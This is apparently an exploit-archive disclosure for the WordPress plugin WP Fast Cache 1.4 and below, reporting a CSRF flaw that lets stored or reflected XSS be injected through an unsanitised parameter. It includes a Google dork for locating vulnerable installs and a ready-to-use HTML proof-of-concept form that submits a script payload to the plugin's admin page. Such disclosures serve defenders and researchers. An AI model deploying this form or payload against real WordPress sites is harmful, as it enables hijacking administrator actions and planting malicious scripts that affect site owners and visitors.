######################

# Exploit Title : WP Fast Cache 1.4 and below CSRF Stored/Reflected XSS

# Exploit Author : Claudio Viviani

# Website Author: http://www.homelab.it
                  http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
                  

# Vendor Homepage : https://wordpress.org/plugins/wp-fast-cache/

# Software Link : https://downloads.wordpress.org/plugin/wp-fast-cache.1.4.zip

# Dork Google: index of wp-fast-cache

# Date : 2015-05-11

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

######################

# Info:

 WP Fast Cache is vulnerable to CSRF attacks, which can also be combined with stored/reflected XSS attacks (authenticated administrators only).


# PoC Exploit:

<html>
Click Here
<form method="post" action="http://10.0.0.67/wordpress/wp-admin/admin.php?page=wp-fast-cache">
  
  <input type="hidden" name="wp_fast_cache_bulk_action" value="cache_this_url">
  <input type="hidden" name="wp_fast_cache_bulk_action_url" value="<script>alert(/XSS/)</script>">
  <input type="submit" name="submit" value="Submit">

</form>
</html>

 wp_fast_cache_bulk_action_url var was not sanitized!
 

# PoC Video:

http://youtu.be/Z7kV3aWE6mU


Discovered By : Claudio Viviani
                http://www.homelab.it
                http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
				
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################